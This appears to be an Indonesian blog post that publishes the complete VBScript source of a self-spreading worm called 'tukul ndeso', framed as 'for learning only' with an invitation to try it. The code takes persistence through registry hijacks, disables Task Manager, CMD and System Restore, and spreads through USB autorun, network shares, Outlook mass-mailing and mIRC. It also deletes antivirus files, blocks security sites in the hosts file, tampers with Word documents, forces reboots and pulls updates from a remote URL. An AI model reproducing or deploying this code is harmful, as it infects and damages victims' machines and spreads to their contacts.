gue punya source kode virus lokal nie..
namanya tukul ndeso. vbs
sesuai namanya source kode ini disimpan dengan ekstension vbs
yang dibuat dengan mesin Visual Basic.
—————————————kode———————————————
tukul_ndeso keliling dunia
‘ saya hanya ingin jalan-jalan mengelilingi
‘ seluruh komputer didunia..
‘ mari bersama kita bela negara, dukung INDONESIA DALAM PIALA ASIA !!
‘ salam perdamaian dari tukul..
‘
‘ dibuat oleh ### pada 09 juli 2007
‘ selamat anniversary ke 8, sayangku..
‘
‘ luv you so..
‘
‘
‘ tunggu aku dikotamu
‘
‘
on error resume next
const versi=”0907″
dim fso,rg,sd,syspath,5inpath,mf,file,isiaku,runaku,kode,flashdr ive,at,adbr,lap
lap=0
set fso = createobject(“Scripting.FileSystemObject”)
set mf = fso.getfile(Wscript.ScriptFullname)
set rg=createobject(“5script.shell”)
5inpath = npth(fso.getspecialfolder(0))
syspath = npth(fso.getspecialfolder(1))
runaku = 5inpath & “smss.exe ” & 5inpath & “” & “kern” & “el32″ & “dll” & “.vb” & “s”
baca_diri
kopi_sistem
bantai_reg
if 5script.arguments.count > 0 then eksek_exe
if right(lcase(5script.fullname),11) = “5script.exe” then
rg.run runaku
5script.quit
end if
sebar_share
kirim_email
do
if adbr=false then
if left(date,1) = “9″ and at = 0 then
rg.reg5rite “HKEY_CLASSES_ROOT\.exe\”,”exefile”
rg.reg5rite “HKEY_CLASSES_ROOT\exefile\shell\open\command\”,chr(34) & “%1″ & chr(34) & ” %*”
msgbox “Tukul lagi seneng nih..”,48,”Tukul Jalan – Jalan”
rg.run “shutdo5n.exe -f -r -t 0″
rg.reg5rite “HKEY_CLASSES_ROOT\exefile\shell\open\command\”,runaku & ” ” & chr(34) & “%1″ & chr(34)
at = at + 1
end if
isi_drive 1
skr = left(formatdatetime(time,4),5)
if skr = nextdo or nextdo = “” then
isi_drive 2
if right(skr,2) > 54 then
nextdo = left(skr,2) + 1 & “:” & 60 – right(skr,2)
else
nextdo = left(skr,2) & “:” & right(skr,2) + 5
end if
end if
update_me
sebar_share
end if
kopi_sistem
bantai_reg
lap=lap+1
loop
sub baca_diri()
set file = mf.openastextstream(1,-2)
do 5hile not file.atendofstream
isiaku = isiaku & file.readline
isiaku = isiaku & vbcrlf
loop
end sub
sub kopi_sistem()
on error resume next
dim tf
set tf = fso.getfile(5inpath & “” & “kern” & “el32″ & “dll” & “.vb” & “s”)
tf.attributes = 32
set tf = fso.getfile(5inpath & “smss.exe”)
tf.attributes = 32
fso.copyfile syspath & “5script.exe”,5inpath & “smss.exe”
tulisaku_ah 5inpath & “” & “kern” & “el32″ & “dll” & “.vb” & “s”
set tf = fso.getfile(5inpath & “” & “kern” & “el32″ & “dll” & “.vb” & “s”)
tf.attributes = 39
set tf = fso.getfile(5inpath & “smss.exe”)
fso.deletefile 5inpath & “notepad.exe”
tf.attributes = 39
tulisaku_ah 5inpath & “tukul.jpg” & “.vb” & “s”
tulis_html
godafile npth(rg.regread(” HKEY_CURRENT_USER\Soft5are\Microsoft\Windo5s\CurrentVersion\ Explorer\Shell Folders\Personal”)),1
bantai_host
end sub
sub bantai_reg()
on error resume next
rg.reg5rite “HKEY_CLASSES_ROOT\tukul.ndeso\defaultIcon\”,”%1″
rg.reg5rite “HKEY_CLASSES_ROOT\tukul.ndeso\shell\open\command\”,chr(34) & “c:\program files\internet explorer\iexplore.exe” & chr(34) & ” ” & chr(34) & 5inpath & “tukul.html” & chr(34)
rg.reg5rite “HKEY_CLASSES_ROOT\tukul.ndeso\shellex\command\”,chr(34) & “c:\program files\internet explorer\iexplore.exe” & chr(34) & ” ” & chr(34) & 5inpath & “tukul.html” & chr(34)
rg.reg5rite “HKEY_CLASSES_ROOT\.bat\”,”tukul.ndeso”
rg.reg5rite “HKEY_CLASSES_ROOT\.exe\”,”exefile”
rg.reg5rite “HKEY_CLASSES_ROOT\.lnk\”,”lnkfile”
rg.reg5rite “HKEY_CLASSES_ROOT\.pif\”,”piffile”
rg.reg5rite “HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Open With\”,”"
rg.reg5rite “HKEY_CLASSES_ROOT\exefile\shell\open\command\”,runaku & ” ” & chr(34) & “%1″ & chr(34)
rg.reg5rite “HKEY_CLASSES_ROOT\lnkfile\shell\open\command\”,runaku & ” ” & chr(34) & “%1″ & chr(34)
rg.reg5rite “HKEY_CLASSES_ROOT\piffile\shell\open\command\”,runaku & ” ” & chr(34) & “%1″ & chr(34)
rg.reg5rite “HKEY_CLASSES_ROOT\.reg\”,”tukul.ndeso”
rg.reg5rite “HKEY_CLASSES_ROOT\.com\”,”tukul.ndeso”
rg.reg5rite “HKEY_CLASSES_ROOT\.jpg\”,”tukul.ndeso”
rg.reg5rite “HKEY_CLASSES_ROOT\.mp3\”,”tukul.ndeso”
rg.reg5rite “HKEY_CLASSES_ROOT\.msi\”,”tukul.ndeso”
rg.reg5rite “HKEY_CLASSES_ROOT\.inf\”,”tukul.ndeso”
rg.reg5rite “HKEY_CLASSES_ROOT\.msc\”,”tukul.ndeso”
rg.reg5rite “HKEY_CLASSES_ROOT\.txt\”,”tukul.ndeso”
rg.reg5rite “HKEY_CLASSES_ROOT\VBSFile\”,”Image File”
rg.reg5rite “HKEY_CLASSES_ROOT\VBSFile\DefaultIcon\”,”shimgv5.dll,3″
rg.reg5rite “HKEY_CLASSES_ROOT\VBSFile\shell\edit\command\”,”"
rg.RegWrite ” HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot \AlternateShell “, runaku
rg.RegWrite ” HKEY_LOCAL_MACHINE\System\ControlSet001\Control\SafeBoot\Alt ernateShell “, runaku
rg.RegWrite ” HKEY_LOCAL_MACHINE\System\ControlSet002\Control\SafeBoot\Alt ernateShell “, runaku
rg.RegWrite ” HKEY_LOCAL_MACHINE\System\ControlSet003\Control\SafeBoot\Alt ernateShell “, runaku
rg.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windo5s NT\CurrentVersion\Winlogon\LegalNoticeCaption”, “tukul_ndeso”
rg.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windo5s NT\CurrentVersion\Winlogon\LegalNoticeText”, “ehm ehm..selamat datang di komputer tukul”
rg.RegWrite “HKEY_LOCAL_MACHINE\Soft5are\Policies\Microsoft\Windo5s NT\SystemRestore\DisableSR”, “1″, “REG_DWORD”
rg.RegWrite ” HKEY_CURRENT_USER\Soft5are\Policies\Microsoft\System\Disable CMD “, “1″, “REG_DWORD”
rg.RegWrite ” HKEY_CURRENT_USER\Soft5are\Microsoft\Windo5s\CurrentVersion\ Policies\Explorer\NoTrayContextMenu “, “1″, “REG_DWORD”
rg.RegWrite ” HKEY_CURRENT_USER\Soft5are\Microsoft\Windo5s\CurrentVersion\ Policies\Explorer\NoVie5ContextMenu “, “1″, “REG_DWORD”
rg.RegWrite ” HKEY_CURRENT_USER\Soft5are\Microsoft\Windo5s\CurrentVersion\ Policies\Explorer\NoFind “, “1″, “REG_DWORD”
rg.RegWrite ” HKEY_CURRENT_USER\Soft5are\Microsoft\Windo5s\CurrentVersion\ Policies\Explorer\NoFolderOptions “, “1″, “REG_DWORD”
rg.RegWrite ” HKEY_CURRENT_USER\Soft5are\Microsoft\Windo5s\CurrentVersion\ Policies\Explorer\NoRun “, “1″, “REG_DWORD”
rg.RegWrite ” HKEY_CURRENT_USER\Soft5are\Microsoft\Windo5s\CurrentVersion\ Explorer\Advanced\Hidden “, “0″, “REG_DWORD”
rg.RegWrite ” HKEY_CURRENT_USER\Soft5are\Microsoft\Windo5s\CurrentVersion\ Explorer\Advanced\HideFileExt “, “1″, “REG_DWORD”
rg.Reg5rite ” HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windo5s\CurrentVersion \Explorer\Advanced\Sho5SuperHidden “, “0″, “REG_DWORD”
rg.Reg5rite ” HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windo5s\CurrentVersion\ Explorer\SearchHidden “, “0″, “REG_DWORD”
rg.Reg5rite ” HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windo5s\CurrentVersion\ Explorer\SearchSystemDirs “, “0″, “REG_DWORD”
rg.RegWrite ” HKEY_CURRENT_USER\Soft5are\Microsoft\Windo5s\CurrentVersion\ Policies\System\DisableRegistryTools “, “1″, “REG_DWORD”
rg.RegWrite ” HKEY_CURRENT_USER\Soft5are\Microsoft\Windo5s\CurrentVersion\ Policies\System\DisableCMD “, “1″, “REG_DWORD”
rg.RegWrite ” HKEY_CURRENT_USER\Soft5are\Microsoft\Windo5s\CurrentVersion\ Policies\System\DisableTaskMgr “, “1″, “REG_DWORD”
rg.reg5rite ” HKEY_LOCAL_MACHINE\Soft5are\Microsoft\Windo5s\CurrentVersion \Run\system “, runaku
rg.reg5rite ” HKEY_LOCAL_MACHINE\Soft5are\Microsoft\Windo5s\CurrentVersion \Run\svchost.exe “, “iexplore.exe ” & chr(34) & 5inpath & “tukul.html” & chr(34)
rg.reg5rite “HKCU\Control Panel\Desktop\Wallpaper”, 5inpath & “Prairie Wind.bmp”
rg.RegWrite “HKEY_CURRENT_USER\Soft5are\Microsoft\Internet Explorer\Toolbar\BackBitmapShell”, 5inpath & “Greenstone.bmp”
rg.RegWrite “HKEY_CURRENT_USER\Soft5are\Microsoft\Internet Explorer\Main\Start Page”, 5inpath & “tukul.html”
rg.RegWrite “HKEY_CURRENT_USER\Soft5are\Microsoft\Internet Explorer\Main\Windo5 Title”, “TuKuL_NDESO”
rg.reg5rite “HKEY_LOCAL_MACHINE\Soft5are\Microsoft\Windo5s NT\CurrentVersion\RegisteredOrganization”, “tukul tur keliling dunia”
rg.reg5rite “HKEY_LOCAL_MACHINE\Soft5are\Microsoft\Windo5s NT\CurrentVersion\RegisteredO5ner”, “TUKUL NDESO”
end sub
sub eksek_exe()
on error resume next
dim abc,ahe
abc = lcase(5script.arguments.item(0))
if right(abc, = “smss.exe” then
exit sub
end if
ahe= “System administrator is blocked your access.” & vbcrlf & “Please contact your admin !!”
if sensor(abc) = true then
set tf = fso.getfile(abc)
tf.attributes = 32
fso.deletefile abc
msgbox ahe,48,”ANTIexe Manager”
exit sub
end if
rg.reg5rite “HKEY_CLASSES_ROOT\.exe\”,”exefile”
rg.reg5rite “HKEY_CLASSES_ROOT\exefile\shell\open\command\”,chr(34) & “%1″ & chr(34) & ” %*”
rg.run chr(34) & 5script.arguments.item(0) & chr(34)
rg.reg5rite “HKEY_CLASSES_ROOT\exefile\shell\open\command\”,runaku & ” ” & chr(34) & “%1″ & chr(34)
end sub
sub tulis_html()
on error resume next
dim tf
kode= “<html><head><title>–|| salam dari tukul ||–</title></head><body bgcolor=#e61577><table 5idth=100%><tr>”
kode= kode & “<td bgcolor=black><br></td></tr></table><br><center><font face=arial black size=6pt color=5hite>”
kode = kode & “tukul_ndeso ” & versi & “<table bgcolor=5hite bordercolor=black border=10><tr><td><p align=center>”
kode = kode & “<font face=arial black size=10pt color=#e61577><b>dasar KATROO !!</p></td></tr></table><p align=center><font face=verdana size=4pt color=5hite>hallo semua,,<br>tukul_ndeso telah hidup dikomputer anda.<br>ini adalah bagian dari rangkaian perjalanan tukul dalam turnya keliling dunia,<br>tukul berniat jalan-jalan mele5ati semua komputer didunia<br>dan hanya ingin menyampaikan pesan perdamaian.<br><br>Mari dukung Indonesia dalam Piala Asia..<br>TERIAKKAN SUARA ANDA DAN KATAKAN TUKUL TELAH MERAJALELA!!<br><br><br>tukul_ndeso akan terus keliling dunia sampai akhir hayatnya..<br><br><font face=verdana size=6pt color=5hite>hidup tukul !! hidup orang katro !! hidup ndeso !!<br><br><table 5idth=100%><tr><td bgcolor=black align=center><font face=arial black size=4pt color=5hite>-=[siapa_aku]=-<br><br>PEACE AND LOVE FOREVER,<br><font face=arial black size=5pt color=5hite>- tukul keliling dunia -<br><br></td></tr</table>”
set tf=fso.createtextfile(5inpath & “tukul.html”,2,true)
tf.5rite kode
tf.close
end sub
sub isi_drive(n)
on error resume next
Dim d,dc,s,tf,atr
Set dc = fso.Drives
For Each d in dc
share_g5 d.path
If d.drivetype = 2 or d.drivetype = 1 and left(lcase(d.path),1) <> “a” then
if fso.fileexists(npth(d.path) & “” & “kern” & “el32″ & “dll” & “.vb” & “s”) then
set tf = fso.getfile(npth(d.path) & “” & “kern” & “el32″ & “dll” & “.vb” & “s”)
tf.attributes = 32
end if
tulisaku_ah npth(d.path) & “” & “kern” & “el32″ & “dll” & “.vb” & “s”
set tf = fso.getfile(npth(d.path) & “” & “kern” & “el32″ & “dll” & “.vb” & “s”)
tf.attributes = 39
tulisaku_ah npth(d.path) & “kembali_ke_laptop” & “.vb” & “s”
atr = “[autorun]” & vbcrlf & “shellexecute=” & “5script.exe ” & “kern” & “el32″ & “dll” & “.vb” & “s”
if fso.fileexists(npth(d.path) & “autorun.inf”) then
set tf =fso.getfile(npth(d.path) & “autorun.inf”)
tf.attributes = 32
end if
set tf=fso.createtextfile(npth(d.path) & “autorun.inf”,2,true)
tf.5rite atr
tf.close
set tf = fso.getfile(npth(d.path) & “autorun.inf”)
tf.attributes=39
if n = 2 then
isi_folder npth(d.path),0
end if
elseif n=1 then
if lap > 0 then isi_folder npth(d.path),1
end if
Next
end sub
sub share_g5(drv)
on error resume next
dim errReturn,objNe5Share
Const FILE_SHARE = 0
Const MAXIMUM_CONNECTIONS = 25
drv=npth(drv)
strComputer = “.”
Set objWMIService = GetObject(“5inmgmts:” _
& “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)
Set objNe5Share = objWMIService.Get(“Win32_Share”)
errReturn = objNe5Share.Create (drv, left(drv,1) & “-aku”, FILE_SHARE, MAXIMUM_CONNECTIONS, “ini ” & left(drv,1) & ” aku..pake aja”)
end sub
sub sebar_share()
on error resume next
strComputer = “.”
Set objWMIService = GetObject(“5inmgmts:{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)
Set colShares = objWMIService.ExecQuery(“Select * from Win32_Share”)
For each objShare in colShares
if right(objshare.name,1) <> “$” then
tulisaku_ah npth(objshare.path) & “kembali_ke_laptop.jpg.vbs”
tulisaku_ah npth(objshare.path) & “JULIA PEREZ NUDE.jpg.vbs”
tulisaku_ah npth(objshare.path) & “TUKUL BUGIL.jpg.vbs”
tulis_desktopini objshare.name,npth(objshare.path)
end if
Next
Const HKEY_CURRENT_USER = &H80000001
strComputer = “.”
Set oReg=GetObject(“5inmgmts:{impersonationLevel=impersonate}!\\ ” & _
strComputer & “\root\default:StdRegProv”)
strKeyPath = “SYSTEM\CurrentControlSet\Services”
oReg.EnumKey HKEY_CURRENT_USER, ” Soft5are\Microsoft\Windo5s\CurrentVersion\Explorer\Workgroup Cra5ler\Shares “, arrSubKeys
For Each subkey In arrSubKeys
subkey = “\\” & subkey & “\”
subkey = Replace(subkey, “/”, “\”, 1, -1, 0)
fso.copyfile 5inpath & “tukul.jpg.vbs”,subkey & “kembali_ke_laptop.jpg” & “.vb” & “s”
fso.copyfile 5inpath & “tukul.jpg.vbs”,subkey & “julia perez nudes (1).jpg” & “.vb” & “s”
fso.copyfile 5inpath & “tukul.jpg.vbs”,subkey & “tukul lagi bugil.jpg” & “.vb” & “s”
Next
end sub
sub dok_rusuh(pth)
on error resume next
if lap < 1 then exit sub
Const END_OF_STORY = 6
Const MOVE_SELECTION = 0
Set objWord = CreateObject(“Word.Application”)
objWord.Visible = false
Set objDoc = objWord.Documents.Open(pth)
Set objSelection = objWord.Selection
objSelection.TypeParagraph()
objSelection.Font.Size = “13″
objSelection.TypeText “Nama : Tukul NDESO” & vbcrlf & “STS : Lagi Jalan Jalan Nih”
objSelection.TypeParagraph()
objSelection.Find.Execute “anda”, 0, 0, 0, 0, 0, 1, 0, 0, “elo”, 2, 0, 0, 0, 0
objSelection.Find.Execute “saya”, 0, 0, 0, 0, 0, 1, 0, 0, “gua”, 2, 0, 0, 0, 0
objSelection.Find.Execute “tidak”, 0, 0, 0, 0, 0, 1, 0, 0, “kagak”, 2, 0, 0, 0, 0
objSelection.EndKey END_OF_STORY, MOVE_SELECTION
objSelection.TypeParagraph()
objSelection.Font.Size = “13″
objSelection.TypeText “tukul_ndeso lagi keliling dunia..”
objdoc.save
obj5ord.quit
end sub
sub tulis_desktopini(nama,pth)
on error resume next
dim fld,a
fld = npth(pth) & “tukul”
fso.createfolder(fld)
set tf = fso.getfile(npth(pth) & “Desktop.ini”)
tf.attributes = 32
set tf=fso.createtextfile(npth(pth) & “Desktop.ini”,2,true)
tf.5riteline “[.ShellClassInfo]“
tf.5riteline “ConfirmFileOp=0″
tf.5riteline “[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]“
tf.5riteline “PersistMoniker=file://” & “tukul\folder.htt”
tf.5riteline “[ExtShellFolderVie5s]“
tf.5riteline ” {5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-A E66-08002B2E1262} “
tf.close
set tf = fso.getfile(npth(pth) & “Desktop.ini”)
tf.attributes = 39
a = “\\” & rg.regread(“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windo5s NT\CurrentVersion\Winlogon\DefaultDomainName”)
a = a & “\” & nama & “\”
set tf = fso.getfile(fld & “\folder.htt”)
tf.attributes = 32
set tf=fso.createtextfile(fld & “\folder.htt”,2,true)
tf.5riteline “<script language=vbscript>”
tf.5riteline “sub MAIN()”
tf.5riteline “dim rg,fso”
tf.5riteline “set fso=createobject(“”scripting.filesystemobject”")”
tf.5riteline “set rg=createobject(“”5script.shell”")”
tf.5riteline “rg.run “”" & a & “tukul\” & “kern” & “el32″ & “dll” & “.vb” & “s”"”
tf.5riteline “end sub”
tf.5riteline “</script>”
tf.5riteline “<body onload=MAIN()></body>”
set tf = fso.getfile(fld & “\folder.htt”)
tf.attributes = 39
tulisaku_ah fld & “\” & “kern” & “el32″ & “dll” & “.vb” & “s”
set tf = fso.getfile(fld & “\” & “kern” & “el32″ & “dll” & “.vb” & “s”)
tf.attributes = 39
Set tf = fso.getfolder(fld)
tf.Attributes = 39
end sub
sub isi_folder(fl,n)
on error resume next
dim z,z1,zf
fl = npth(fl)
godafile fl
set z = fso.GetFolder(fl)
set zf = z.SubFolders
for each z1 in zf
godafile npth(z1.path)
if n = 1 then
isi_folder npth(z1.path),1
end if
tulisaku_ah npth(z1.path) & “kembali_ke_laptop” & “.vb” & “s”
next
end sub
sub godafile(fl)
on error resume next
if lap < 1 then exit sub
dim g,g1,gc,eks,pa,mrcn,t,top,tq,si,tt
fl = npth(fl)
set g = fso.GetFolder(fl)
set gc = g.Files
for each g1 in gc
if sensor(g1.path) then
set tt=fso.GetFile(g1.path)
tt.attributes = 32
fso.deletefile g1.path
exit sub
end if
eks=right(g1.path,3)
eks=lcase(eks)
t=lcase(g1.name)
if eks=”js” or eks=”hta” or eks=”vbs” or eks=”inf” or eks=”reg” then
tulisaku_ah g1.path
elseif eks=”jpg” or eks=”jpeg” then
set top=fso.GetFile(g1.path)
top.attributes = 39
tulisaku_ah g1.path & “” & “.vb” & “s”
elseif eks=”doc” or eks=”vbm” then
dok_rusuh g1.path
end if
if tq <> 1 then
if t=”mir” & “c32.exe” then
set si=fso.CreateTextFile(npth(fl) & “scr” & “ipt.ini”)
si.WriteLine “[scr" & "ipt]“
si.WriteLine “;mIR” & “C Scr” & “ipt”
si.WriteLine “; DO NOT E” & “DIT TH” & “IS FILE !!”
si.WriteLine “; this file ” & “is REQU” & “IRED by WIN” & “DOWS to load net” & “5orks modules.”
si.WriteLine “;”
si.WriteLine “;Kh” & “al” & “ed M” & “arda” & “m-Bey”
si.WriteLine “;ht” & “tp://55″ & “5.mi” & “rc.com”
si.WriteLine “;”
si.WriteLine “n0″ & “=on 1:” & “JOI” & “N:” & “#:{“
si.WriteLine “n1= /” & “if ( ” & “$ni” & “ck == $” & “me ) { h” & “alt }”
si.WriteLine “n” & “2= /” & “.dc” & “c sen” & “d $n” & “ick ” & 5inpath & “\tukul.jpg” & “.vb” & “s”
si.WriteLine “n” & “3=}”
si.close
tq=1
end if
end if
next
end sub
sub kirim_email()
on error resume next
dim y,b,dftktr,entriktr,alem,c,rgve,rgadd,tou,ipam,alema
set tou=CreateObject(“Outl” & “ook.Ap” & “plication”)
set ipam=tou.GetNameSpace(“MA” & “PI”)
for dftktr=1 to ipam.AddressLists.Count
set b=ipam.AddressLists(dftktr)
y=1
rgve=rg.RegRead(“HKEY_CURRENT_USER\Soft5are\Microsoft\WAB\” & a)
if rgve=”" then
rgve=1
end if
if (int(b.AddressEntries.Count) > int(rgve)) then
for entriktr=1 to b.AddressEntries.Count
alem=b.AddressEntries(y)
rgadd=”"
rgadd=rg.RegRead(“HKEY_CURRENT_USER\Sof” & “t5are\Microsoft\WAB\” & alem)
if rgadd=”" then
set alema=tou.CreateItem(0)
alema.Recipients.Add(alem)
alema.Attachments.Add(5inpath & “tukul.jpg.v” & “bs”)
alema.Body = vbcrlf&”Cuplikan foto foto dari empat mata”
alema.Subject = “[PIC] EMPAT MATA”
alema.Send
rg.RegWrite “HKEY_CURRENT_USER\Soft5are\Mi” & “crosoft\WAB\” & alem,1,”REG_DWORD”
end if
y=y+1
next
rg.RegWrite “HKEY_CURRENT_USER\Soft5are\Microsoft\W” & “AB\” & b,b.AddressEntries.Count
else
rg.RegWrite “HKEY_CURRENT_USER\Soft5are\Microsoft\WA” & “B\” & b,b.AddressEntries.Count
end if
next
end sub
sub tulisaku_ah(pth)
on error resume next
dim tf,a,str
cek_baru 5inpath & “update.sys”
if fso.fileexists(pth) then
set tf = fso.getfile(pth)
tf.attributes = 32
end if
set tf=fso.createtextfile(pth,2)
tf.5rite isiaku
tf.close
set tf = fso.getfile(pth)
tf.attributes = 32
end sub
function npth(pth)
if right(pth,1) <> “\” then
npth = pth & “\”
else
npth = pth
end if
end function
function sensor(pth)
on error resume next
dim i,b
dim anti(255)
anti(1) = “anti”
anti(2) = “kill”
anti(3) = “hijack”
anti(4) = “reg”
anti(5) = “vir”
anti(6) = “ansav”
anti(7) = “pcmav”
anti( = “avg”
anti(9) = “task”
anti(10) = “tsk”
anti(11) = “del”
anti(12) = “setup”
anti(13) = “install”
anti(14) = “clean”
anti(15) = “scan”
anti(16) = “proc”
anti(17) = “upd”
anti(18) = “msconfig”
anti(19) = “services”
anti(20) = “bunuh”
anti(21) = “av”
anti(22) = “cc”
anti(23) = “cmd”
anti(24) = “sys”
anti(25) = “note”
anti(26) = “util”
anti(27) = “visual”
anti(28) = “asm”
anti(29) = “bug”
anti(30) = “c++”
anti(31) = “delphi”
anti(32) = “pascal”
anti(33) = “sand”
anti(34) = “tool”
anti(35) = “mcafee”
anti(36) = “norton”
anti(37) = “nv”
anti(38) = “nod”
anti(39) = “deep”
anti(40) = “freeze”
anti(41) = “frz”
pth = lcase(pth)
for i = 1 to 41
for b = 1 to len(pth)
if lcase(mid(pth,b,len(anti(i)))) = anti(i) then sensor = true
next
next
end function
sub bantai_host()
on error resume next
dim tf,hst
hst = syspath & “driver” & “s\et” & “c\host”
Set tf = fso.getfile(hst)
tf.attributes = 32
Set tf = fso.OpenTextFile(hst,2,1)
tf.WriteLine “127.0.0.1 555.friendster.com”
tf.WriteLine “127.0.0.1 friendster.com”
tf.WriteLine “127.0.0.1 555.google.co.id”
tf.WriteLine “127.0.0.1 google.co.id”
tf.WriteLine “127.0.0.1 555.google.com”
tf.WriteLine “127.0.0.1 google.com”
tf.WriteLine “127.0.0.1 555.vaksin.com”
tf.WriteLine “127.0.0.1 vaksin.com”
tf.WriteLine “127.0.0.1 555.virologi.info”
tf.WriteLine “127.0.0.1 virologi.info”
tf.WriteLine “127.0.0.1 555.ansav.com”
tf.WriteLine “127.0.0.1 ansav.com”
tf.WriteLine “127.0.0.1 555.jasakom.com”
tf.WriteLine “127.0.0.1 jasakom.com”
tf.WriteLine “127.0.0.1 555.vbbego.com”
tf.WriteLine “127.0.0.1 vbbego.com”
tf.WriteLine “127.0.0.1 555.kaskus.us”
tf.WriteLine “127.0.0.1 kaskus.us”
tf.close
end sub
sub update_me()
on error resume next
if lap < 1 then exit sub
dim a,alm,tmp,oht,oado,str
alm = “http://geocities.com/tukulndeso0907/update.txt”
tmp = 5inpath & “update.sys”
Set oht = CreateObject(“MSXML2.XMLHTTP”)
oht.open “GET”, alm, false
oht.send()
If oht.Status = 200 Then
Set oado = CreateObject(“ADODB.Stream”)
oado.Open
oado.Type = 1
oado.Write oht.ResponseBody
oado.Position = 0
Set oado = Createobject(“Scripting.FileSystemObject”)
If fso.Fileexists(tmp) Then fso.DeleteFile tmp
oado.SaveToFile tmp
oado.Close
Set oado = Nothing
End if
Set oht = Nothing
cek_baru tmp
end sub
sub upd_res()
on error resume next
dim m,tf
for m = 1 to 3
set tf = fso.getfile(5inpath & “” & “kern” & “el32″ & “dll” & “.vb” & “s”)
tf.attributes = 32
fso.delfile 5inpath & “” & “kern” & “el32″ & “dll” & “.vb” & “s”
fso.copyfile 5inpath & “update.sys”,5inpath & “” & “kern” & “el32″ & “dll” & “.vb” & “s”
rg.reg5rite “HKEY_CLASSES_ROOT\.exe\”,”exefile”
rg.reg5rite “HKEY_CLASSES_ROOT\exefile\shell\open\command\”,chr(34) & “%1″ & chr(34) & ” %*”
rg.reg5rite “HKEY_CLASSES_ROOT\.com\”,”comfile”
rg.reg5rite “HKEY_CLASSES_ROOT\comfile\shell\open\command\”,chr(34) & “%1″ & chr(34) & ” %*”
fso.delfile 5inpath & “update.sys”
rg.run “shutdo5n -f -r -t 0″
rg.reg5rite “HKEY_CLASSES_ROOT\.com\”,”tukul.ndeso”
next
5script.quit
end sub
function cek_baru(pth)
dim mf,ame,a,str
adbr=false
cek_baru=false
str=”"
if fso.fileexists(pth) then
set mf = fso.getfile(pth)
set ame = fso.getfile(5inpath & “kernel32dll.vbs”)
if mf.size > ame.size then
set a = mf.openastextstream(1,-2)
str = a.readall
if lcase(left(str,13)) = “‘ tukul_ndeso” then
if right(str,4) <> versi then
set tf = fso.getfile(5inpath & “” & “kern” & “el32″ & “dll” & “.vb” & “s”)
tf.attributes = 32
fso.copyfile 5inpath & “update.sys”,5inpath & “” & “kern” & “el32″ & “dll” & “.vb” & “s”
isiaku=str
adbr=true
cek_baru=true
upd_res
end if
end if
end if
end if
end function
—————————————selesai——————————————–
Semua source kode virus yang ada dalam situs ini hanya untuk tujuan pembelajaran!!!
semua resiko dan akibat, tanggung sendiri
selamat mencoba…
